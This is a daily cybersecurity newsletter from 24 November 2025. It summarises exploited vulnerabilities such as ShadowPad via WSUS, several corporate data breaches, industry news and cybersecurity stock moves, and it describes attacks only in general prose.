Cyber Briefing: 2025.11.24

ShadowPad and new C2 tactics emerge, Windows 11 bug causes crashes, major breaches hit multiple firms, WINS retired, teens charged, and Android gains AirDrop support.

Nov 24, 2025

👉 What’s the latest in the cyber world today?

Welcome to Cyber Briefing, the newsletter that informs you about the latest cybersecurity advisories, alerts, incidents and news every weekday.

First time seeing this? Please Subscribe

Get Help

🚨 Cyber Alerts

1. ShadowPad Exploits WSUS Flaw For Access

A critical deserialization flaw in Microsoft Windows Server Update Services (WSUS), tracked as CVE-2025-59287, has been actively exploited by threat actors to achieve remote code execution and deploy the advanced modular backdoor known as ShadowPad. Attackers used utilities like PowerCat for initial access and then curl and certutil to download and install ShadowPad, which is launched via DLL side-loading and is a powerful espionage tool linked to Chinese state-sponsored hacking groups.

2. Matrix Push C2 Uses Browser Alerts To Phish

Bad actors are now exploiting browser notifications for phishing through a new command-and-control (C2) platform known as Matrix Push C2. This sophisticated, fileless framework uses push notifications, fake alerts, and link redirects to compromise victims across various operating systems.

3. Windows 11 24H2 Explorer And Start Crash

A critical bug in Windows 11 24H2, introduced by cumulative updates released since July 2025, is causing core components like File Explorer and the Start Menu to crash, especially for users logging in after applying updates or those in non-persistent virtual desktop environments. Microsoft confirms the issue stems from a timing error where essential XAML dependency packages fail to register properly post-update, but has provided a temporary PowerShell workaround for affected users.

For more alerts, click here!

Subscribe Now

💥 Cyber Incidents

4. Cox Confirms Oracle Hack As Victims Named

Cox Enterprises confirmed its Oracle E-Business Suite (EBS) was breached by cybercriminals between August 9 and 14, leading to the compromise of personal data belonging to nearly 9,500 individuals. This incident is part of a larger cybercrime campaign, linked to the Cl0p ransomware group and the FIN11 threat actor, which has targeted over 100 organizations globally, including major companies like Logitech and Mazda.

5. Iberia Alerts Customers To Data Breach

Spanish flag carrier Iberia notified customers that their names, email addresses, and frequent flyer numbers were stolen after a supplier was hacked. The airline stated that no passwords or full credit card data were compromised, and they have improved account security while investigating the incident with law enforcement.

6. Delta Dental Virginia Breach Hits 146000

Dental services provider Delta Dental of Virginia (DDVA) has disclosed a data breach affecting approximately 146,000 individuals after an email account compromise allowed an unauthorized party to access and potentially steal personal and protected health information between March 21 and April 23 of this year. The compromised data included sensitive details such as names, Social Security numbers, and government-issued ID numbers, prompting DDVA to offer 12 months of free identity protection and credit monitoring services to those impacted.

For more incidents click here!

Read Report

📢 Cyber News

7. Microsoft To Remove WINS After 2025

Microsoft has announced that the legacy Windows Internet Name Service (WINS) will be removed from Windows Server following the Windows Server 2025 Long-Term Servicing Channel release, with standard support for WINS ending in November 2034.

8. Scattered Spider Members Deny TfL Charges

Two British teenagers, Thalha Jubair (19) and Owen Flowers (18), associated with the Scattered Spider hacking group, pleaded not guilty at Southwark Crown Court to charges related to a cyberattack against Transport for London (TfL). Both are charged under the Computer Misuse Act for allegedly conspiring to commit unauthorized acts against the transport network.

9. Google Adds AirDrop Support To Android

Google has updated its Quick Share file transfer service to work with Apple’s AirDrop, enabling easier file and photo sharing between Android (starting with the Pixel 10) and iPhone devices.

For more news click here

Check Events

📈Cyber Stocks

On Monday, 24th November, cybersecurity stocks opened the week on a softer note as market sentiment remained cautious following last week’s selloff. Investors continued to grapple with macroeconomic uncertainty, subdued risk appetite, and concerns around enterprise IT spending cycles. While long-term demand for identity, cloud, and endpoint security stayed intact, the sector saw mixed performance with most names trending lower and only limited signs of stabilisation.

CrowdStrike closed at 490.67 dollars and declined further, extending its multi-session pullback as investors continued rotating out of high-growth cybersecurity names.
Palo Alto Networks closed at 182.90 dollars and moved lower, reflecting persistent caution around near-term enterprise budget timing and sector-wide valuation pressure.
Zscaler closed at 275.01 dollars and fell again, driven by continued weakness in cloud-security valuations despite strong underlying zero-trust adoption trends.
Fortinet closed at 78.86 dollars and posted a mild gain, supported by selective interest in defensive network-security names despite lingering concerns around firewall refresh cycles.
Okta closed at 78.68 dollars and edged slightly higher, indicating steady sentiment toward identity-security demand even as broader market conditions stayed fragile.

💡 Cyber Tip

🖥️ Windows 11 24H2 Bug Causes Explorer and Start Menu Crashes

Microsoft has confirmed a serious issue in Windows 11 version 24H2 where File Explorer, the Start Menu, and other shell components crash after installing recent cumulative updates. The problem affects users who log in right after updating and is especially disruptive in virtual desktop (VDI) environments. The root cause is a timing error that prevents essential XAML packages from registering properly during the post-update process.

What You Should Do

If your system is affected, use Microsoft’s temporary PowerShell fix to manually re-register the missing XAML packages.
Restart your device after applying the workaround to restore full functionality.
In VDI or non-persistent environments, use Microsoft’s recommended logon script to ensure required packages register before the desktop loads.
Delay applying July 2025 or later cumulative updates on critical systems until Microsoft releases a full fix.

Why This Matters

This bug can break core parts of the Windows interface, leaving systems partially usable or completely unstable. Organizations using VDI are at higher risk due to repeated provisioning, making the timing issue occur on every login. Applying the workaround helps restore stability until Microsoft releases a permanent update.